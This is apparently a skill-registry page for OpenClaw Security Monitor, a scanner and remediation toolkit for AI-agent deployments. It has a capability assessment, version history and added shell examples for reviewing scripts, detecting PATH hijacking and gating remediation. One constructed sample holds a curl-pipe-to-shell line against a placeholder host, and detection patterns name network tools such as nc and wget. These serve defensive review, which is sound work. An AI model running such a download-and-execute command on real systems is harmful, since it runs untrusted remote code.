OpenClaw Security Monitor

by Adrian Birzu · GitHub ↗ · v5.3.2 · MIT-0
Platforms: darwin, linux · ✓ Security Clean
3169 Downloads · 6 Stars · 25 Active Installs · 18 Versions
Install in OpenClaw
/install openclaw-security-monitor
Description
Proactive security monitoring, threat scanning, and auto-remediation for OpenClaw deployments
Usage Guidance
This project appears to be what it claims: a local security scanner and remediation toolkit. Before installing or running anything:
  1. Review the remediation scripts (scripts/remediate/*.sh) to understand what changes they make; run remediate.sh with --dry-run first.
  2. Do not enable unattended remediation (OPENCLAW_ALLOW_UNATTENDED_REMEDIATE) on production systems without manual review.
  3. Scans read sensitive files (openclaw.json, SKILL.md, logs, and potentially ~/.ssh and .env files); treat scan output as sensitive.
  4. Inspect update-ioc.sh and telegram-setup.sh to confirm which remote endpoints they contact before allowing network access.
  5. Verify the repository origin (https://github.com/adibirzu/openclaw-security-monitor) and consider running it first in an isolated, non-production instance.
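A worked version of the review the guidance above asks for (read the remediation scripts, find out which remote endpoints update-ioc.sh and friends contact): a small POSIX shell reviewer that greps a skill directory for URLs and network tools, download-and-execute pipes, and commands that change system state. It is added here and is not code from the project. The scripts it writes with make_sample_skill are constructed stand-ins, the hostnames in them are placeholders, and the function names are this example's own.

```shell
#!/bin/sh
# Pre-install review of a skill's scripts. Added example, not the project's own
# code: greps a skill directory for the things to check before running
# remediate.sh or update-ioc.sh: remote endpoints and network tools,
# download-and-execute pipes, and commands that change system state.
# The sample scripts written by make_sample_skill are constructed stand-ins and
# the hostnames in them are placeholders.

make_sample_skill() {   # $1: directory to populate with constructed scripts
  mkdir -p "$1/scripts/remediate"
  cat > "$1/scripts/update-ioc.sh" <<'EOF'
#!/bin/sh
# constructed: refresh the IOC list from a feed (placeholder host)
curl -fsSL https://ioc.example.invalid/feed.txt -o "$HOME/.openclaw/ioc.txt"
EOF
  cat > "$1/scripts/install.sh" <<'EOF'
#!/bin/sh
# constructed: the pipe-to-shell pattern a reviewer should reject outright
curl -fsSL https://get.example.invalid/install.sh | sh
EOF
  cat > "$1/scripts/remediate/fix-perms.sh" <<'EOF'
#!/bin/sh
chmod 600 "$HOME/.openclaw/openclaw.json"
EOF
  cat > "$1/scripts/remediate/block-domains.sh" <<'EOF'
#!/bin/sh
echo "0.0.0.0 bad.example.invalid" | sudo tee -a /etc/hosts
EOF
}

# file:line:text for every URL and every network-capable tool (-w: whole words).
find_network_calls() {
  grep -rnwE 'https?://[^[:space:]]+|curl|wget|nc|ncat|ssh|scp' "$1" 2>/dev/null || true
}

# file:line:text for download-and-execute: curl/wget output piped into a shell.
find_pipe_to_shell() {
  grep -rnE '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([[:space:]]|$)' \
    "$1" 2>/dev/null || true
}

# file:line:text for commands that touch permissions, persistence or system
# files; sort -u merges a line that matches both patterns.
find_mutations() {
  {
    grep -rnwE 'chmod|chown|sudo|tee -a|crontab|launchctl|systemctl|rm -rf?' "$1" 2>/dev/null || true
    grep -rnE '>>?[[:space:]]*/etc/|/etc/hosts' "$1" 2>/dev/null || true
  } | sort -u
}

# The three findings lists for one skill directory, in the order to read them.
review_skill() {
  echo "== remote endpoints / network tools =="; find_network_calls "$1"
  echo "== pipe-to-shell (reject) ==";          find_pipe_to_shell "$1"
  echo "== system mutations (read, then dry-run) =="; find_mutations "$1"
}

if [ "${1:-}" = demo ]; then           # sh review-skill.sh demo
  d=$(mktemp -d); make_sample_skill "$d"; review_skill "$d"; rm -rf "$d"
fi
```

Run it with the demo argument to see the findings on the constructed sample, or call review_skill on the real install directory under ~/.openclaw/workspace/skills/. Any hit in the pipe-to-shell list is a reason to stop; hits in the other two lists are the lines to read before a --dry-run, and the URLs are the endpoints to allow or block at the network layer.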
Capability Analysis
Type: OpenClaw Skill
Name: openclaw-security-monitor
Version: 5.3.2
The bundle is a legitimate security monitoring and hardening utility for OpenClaw deployments. It provides a suite of scripts (scan.sh, remediate.sh, update-ioc.sh) designed to detect and mitigate known threats such as the ClawHavoc malware campaign, credential stealers, and over 60 disclosed CVEs. The scanner uses grep-based pattern matching against local files and configuration, while the remediation scripts apply transparent fixes such as tightening file permissions (chmod 600) and blocking malicious domains via /etc/hosts. The tool requires an explicit opt-in for automated fixes (OPENCLAW_ALLOW_UNATTENDED_REMEDIATE) and provides a read-only web dashboard (server.js) for visibility without execution risk.
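To make the pattern-matching check model concrete, here is one scanner check (PATH hijacking) written out in full. It is an added example, not the project's scanner. The allowlist of Homebrew prefixes, the finding format and the function names are assumptions of this example; the Homebrew false positive it avoids is the one the v5.3.2 entry in the version history describes.

```shell
#!/bin/sh
# One scanner check written out in full, as an added example (not the project's
# code): PATH hijacking. A directory searched before /usr/bin that other users can
# write to lets anyone plant a fake "node" or "curl"; an empty or relative PATH
# entry resolves against the current directory. Homebrew prefixes legitimately sit
# ahead of /usr/bin on macOS, so they are allowlisted instead of reported.
# Allowlist and output format are this example's own choices.

PATH_ALLOWLIST="/opt/homebrew/bin /opt/homebrew/sbin /usr/local/bin /usr/local/sbin"

is_allowlisted() {          # $1: directory
  for p in $PATH_ALLOWLIST; do [ "$1" = "$p" ] && return 0; done
  return 1
}

# Checks the PATH-style string in $1. Prints one finding per line and returns 1
# if there were any; prints nothing and returns 0 when clean. Entries are split
# with parameter expansion so empty ones (":a::b", trailing ":") are not lost.
check_path_hijack() {
  rest="$1:"; seen_system=0; found=0
  while [ -n "$rest" ]; do
    d=${rest%%:*}; rest=${rest#*:}
    case "$d" in
      ""|[!/]*) echo "relative-entry: '$d' resolves against the current directory"
                found=1; continue;;
      /usr/bin|/bin) seen_system=1;;
    esac
    [ -d "$d" ] || continue
    if [ "$seen_system" -eq 0 ] && ! is_allowlisted "$d"; then
      perms=$(ls -ld "$d" | cut -c1-10)          # e.g. drwxrwxrwx
      case "$perms" in                           # group- or world-writable
        ?????w????|????????w?) echo "writable-before-system: $d ($perms)"; found=1;;
      esac
    fi
  done
  return "$found"
}

if [ "${1:-}" = demo ]; then        # sh path-check.sh demo
  check_path_hijack "$PATH" && echo "PATH: no findings"
fi
```

The exit status follows the scanner convention of failing when there are findings, so the function drops straight into a cron or CI job. Directories after /usr/bin are deliberately not reported: they cannot shadow system binaries, which keeps the check quiet on ordinary ~/.local/bin setups.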
Capability Tags
crypto · requires-wallet · requires-oauth-token · requires-sensitive-credentials
Capability Assessment
Purpose & Capability
Name/description (security monitoring, scanning, remediation) match the included assets: 41-point scanner, IOC lists, read-only dashboard, and remediation scripts. Requested binaries (bash, curl, node, lsof) and the brew node install are appropriate for a Node dashboard plus shell tooling.
Instruction Scope
Runtime instructions invoke local scripts under ~/.openclaw/workspace/skills/<skill-dir>/scripts/*.sh. The dashboard and scanner intentionally read OpenClaw state (logs, openclaw.json, other SKILL.md files, skills directory). This is expected for a security auditor but means the tool will read sensitive local files (gateway tokens, device files, memory/SOUL files) when run — review and consent before executing.
Install Mechanism
Installer clones the GitHub repo and makes scripts executable; the registry install entry only suggests installing node via brew. No opaque binary downloads or extract-from-arbitrary-URL installs were present in the manifest. Note: update-ioc and telegram setup scripts may fetch external IOC/alerting feeds (normal for this tool) — inspect their endpoints if you need to restrict network calls.
Credentials
The skill declares no required environment variables, which matches the manifest. The scanner and remediation logic nonetheless read sensitive local configuration and artifacts (.openclaw logs, openclaw.json, skill SKILL.md files, ~/.ssh, and .env files referenced by the checks). This access is proportionate to the security purpose but should be treated as high-sensitivity read access. Telegram/alerting features require tokens or webhooks (optional) that are not declared in advance.
Persistence & Privilege
always:false and disable-model-invocation:true reduce autonomous blast radius. Persistence (cron) is strictly optional and requires explicit user action. The skill does include automated remediation scripts that can make system changes when you run them; unattended remediation requires an explicit env opt-in (OPENCLAW_ALLOW_UNATTENDED_REMEDIATE=1).
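The remediation gating described above, as an added example that is not the project's code: idempotent versions of the chmod 600 and /etc/hosts fixes, with dry-run as the default and an unattended apply refused unless OPENCLAW_ALLOW_UNATTENDED_REMEDIATE=1 is set. File paths are parameters so the functions can be tried on copies rather than the live /etc/hosts; the function names and the sample IOC list are this example's own.

```shell
#!/bin/sh
# Added example, not the project's remediation code: the two fixes named on this
# page (chmod 600 on a secrets-bearing config file, blocking IOC domains through
# /etc/hosts), written the way a reviewer wants to see them. Every change is
# idempotent, dry-run is the default, and "apply" is refused when stdin is not
# a terminal unless OPENCLAW_ALLOW_UNATTENDED_REMEDIATE=1 is set, mirroring the
# opt-in this page describes. Paths are parameters so the functions can be tried
# on copies rather than the live /etc/hosts; function names are this example's.

# Interactive session, or explicit opt-in to unattended changes.
remediation_allowed() {
  [ -t 0 ] && return 0
  [ "${OPENCLAW_ALLOW_UNATTENDED_REMEDIATE:-0}" = 1 ]
}

# $1 file, $2 dry-run|apply. Prints: unchanged | fixed | would-fix (<current mode>).
secure_file_mode() {
  cur=$(ls -l "$1" | cut -c2-10)
  if [ "$cur" = "rw-------" ]; then echo unchanged; return 0; fi
  if [ "${2:-dry-run}" = apply ]; then chmod 600 "$1"; echo fixed; else echo "would-fix ($cur)"; fi
}

# $1 hosts file, $2 IOC list (one domain per line, # comments), $3 dry-run|apply.
# Prints how many domains were (or would be) appended; a domain that already has
# a hosts entry is skipped, so re-running never duplicates lines.
block_domains() {
  hosts=$1; mode=${3:-dry-run}; added=0
  while IFS= read -r dom; do
    case "$dom" in ""|\#*) continue;; esac
    esc=$(printf '%s' "$dom" | sed 's/[.]/\\./g')      # literal dots in the regex
    if grep -qE "^[^#]*[[:space:]]$esc([[:space:]]|\$)" "$hosts"; then continue; fi
    if [ "$mode" = apply ]; then
      printf '0.0.0.0 %s\n' "$dom" >> "$hosts"
    else
      echo "[dry-run] would append: 0.0.0.0 $dom" >&2
    fi
    added=$((added + 1))
  done < "$2"
  echo "$added"
}

# $1 dry-run|apply, $2 hosts file, $3 IOC list, $4 config file.
# Returns 2 when an unattended "apply" is refused; otherwise reports both fixes.
remediate() {
  mode=${1:-dry-run}
  if [ "$mode" = apply ] && ! remediation_allowed; then
    echo "refused: stdin is not a terminal and OPENCLAW_ALLOW_UNATTENDED_REMEDIATE is not 1" >&2
    return 2
  fi
  echo "config file mode: $(secure_file_mode "$4" "$mode")"
  echo "IOC domains ($mode): $(block_domains "$2" "$3" "$mode")"
}

if [ "${1:-}" = demo ]; then         # sh remediate-example.sh demo (constructed inputs)
  d=$(mktemp -d)
  printf '127.0.0.1 localhost\n' > "$d/hosts"
  printf '# constructed IOC list\nbad1.example.invalid\nbad2.example.invalid\n' > "$d/ioc.txt"
  : > "$d/openclaw.json"; chmod 644 "$d/openclaw.json"
  remediate dry-run "$d/hosts" "$d/ioc.txt" "$d/openclaw.json"
  rm -rf "$d"
fi
```

The dry-run output goes to stderr and the count to stdout, so a wrapper can read the number while a human reads the plan. Because "apply" against /etc/hosts needs root, the realistic unattended invocation is a root cron job, which is exactly the case where the terminal check fails and the explicit environment opt-in is the only thing standing between a refreshed IOC feed and a silent rewrite of the hosts file.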
How to Use
  1. Make sure OpenClaw is installed (local or Docker)
  2. Run the install command in chat: /install openclaw-security-monitor
  3. After installation, invoke the skill by name or use /openclaw-security-monitor
  4. Provide required inputs per the skill's parameter spec and get structured output
Version History
v5.3.2
Patch v5.3.2 fixes PATH hijack false positives for normal Homebrew-managed binaries while keeping the OpenClaw v2026.4.24 baseline and April 2026 advisory coverage.
v5.3.1
Update OpenClaw Security Monitor to v5.3.1: current recommended baseline v2026.4.24; refresh GitHub/skill metadata and keep April 2026 advisory coverage for setup-api.js cwd execution, webhook SecretRef replay, gateway config mutation guard bypass, dotenv connector/runtime overrides, MCP owner-context/tool-policy issues, OpenShell FS bridge escapes, and expanded ClawHub artifact scanning.
v5.3.0
Update OpenClaw Security Monitor to v5.3.0: current safe baseline v2026.4.23; adds April 21-24 advisory coverage for setup-api.js cwd execution, webhook SecretRef replay, gateway config mutation guard bypass, dotenv connector/runtime overrides, MCP owner-context/tool-policy issues, OpenShell FS bridge escapes, and expanded ClawHub skill artifact scanning.
v5.2.1
Finalize bundle-plugin support and keep corrected ClawHub metadata.
v5.2.0
Add bundle-plugin manifest, keep ClawHub metadata fixes, and preserve April 2026 threat coverage.
v5.1.1
Move requirements into metadata.openclaw, add registry-visible install metadata, and prepare for bundle-plugin publishing.
v5.1.0
Add April 2026 advisory coverage, raise safe baseline to v2026.4.15, and refresh IOC/update logic.
v4.2.1
v4.2.1: Safety posture hardening — removed curl|bash installer, IOC updates require interactive confirmation, no auto-installed persistence/symlinks/cron. Complete remediation guides for all 59 checks. Expanded Security & Transparency documentation.
v4.2.0
v4.2.0: Complete remediation guides for all 59 checks. Dashboard with IOC stats, skills list, check filters, remediation log. 8 new security checks (CVE-2026-28469, CVE-2026-28472, CVE-2026-32302, GHSA-7h7g, GHSA-vmhq, MCP tool poisoning, SANDWORM_MODE worm detection, rules file Unicode injection). 35+ CVEs, 40+ GHSAs, 1,200+ malicious packages.
v4.1.1
Fix ClawHub URL in issue, add IOC/skills/config panels to dashboard, expand README with CVE mapping table and threat intelligence sources.
v4.1.0
Remove child_process from dashboard to resolve ClawHub security flag. Dashboard is now read-only (no shell execution). Scans and remediation are CLI-only. Added install.sh for one-command setup. Updated README with all 59 checks.
v4.0.0
v4.0.0: 59-point scanner with 8 new checks (CVE-2026-28469, CVE-2026-28472, CVE-2026-32302, GHSA-7h7g, GHSA-vmhq, MCP tool poisoning, SANDWORM_MODE worm detection, rules file Unicode injection). 35+ CVEs, 40+ GHSAs, 1,200+ malicious packages.
v3.4.0
Add checks 37-40: PATH hijacking (GHSA-jqpq), env override injection (GHSA-82g8), macOS deep link truncation (CVE-2026-26320), log poisoning/WebSocket header injection. 40-point scanner with 8 new remediation scripts and 22 hardening recommendations.
v3.2.0
openclaw-security-monitor 3.2.0 changelog:
- Updated SKILL.md version to 3.2.0.
- No changes to functionality, commands, or usage documented.
- All previous features, instructions, and documentation remain unchanged.
v3.1.0
Major threat intel update: 9 new CVEs, expanded ClawHavoc (824+ skills), Vidar infostealer campaign, improved WebSocket check, 12 new threat sources. Minimum safe OpenClaw version now v2026.2.14.
v3.0.1
Clean re-publish: 32-point security scanner with per-check auto-remediation, web dashboard, IOC database, Telegram alerts
v3.0.0
Add 32 per-check remediation scripts with auto-fix and guidance modes, dashboard remediation UI with per-check and Remediate All buttons, fix dynamic check numbering, expand .gitignore
v0.1.0
Initial release of openclaw-security-monitor: comprehensive security for OpenClaw deployments.
- Provides 32-point security scan, auto-remediation, and actionable exit codes.
- Real-time monitoring, daily automated scans, and centralized dashboard with process visualizations.
- Telegram alerting and detailed network IOC (Indicators of Compromise) checks included.
- Extensive remediation options: auto-fix, dry-run, per-check, or full coverage.
- Integrates threat intelligence from over 40 leading security sources and real-world attack research.
- Easy installation and seamless agent command integration via SKILL.md.
Metadata
Slug openclaw-security-monitor
Version 5.3.2
License MIT-0
All-time Installs 25
Active Installs 25
Total Versions 18
Frequently Asked Questions

What is OpenClaw Security Monitor?

Proactive security monitoring, threat scanning, and auto-remediation for OpenClaw deployments. It is an AI Agent Skill for Claude Code / OpenClaw, with 3169 downloads so far.

How do I install OpenClaw Security Monitor?

Run "/install openclaw-security-monitor" in the OpenClaw or Claude Code chat. The installer clones the GitHub repository and marks the scripts executable; the registry entry additionally suggests installing node (via brew) for the dashboard.

Is OpenClaw Security Monitor free?

Yes, OpenClaw Security Monitor is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does OpenClaw Security Monitor support?

OpenClaw Security Monitor declares darwin and linux as supported platforms and runs wherever OpenClaw / Claude Code is available on those systems.

Who created OpenClaw Security Monitor?

It is built and maintained by Adrian Birzu (@adibirzu); the current version is v5.3.2.
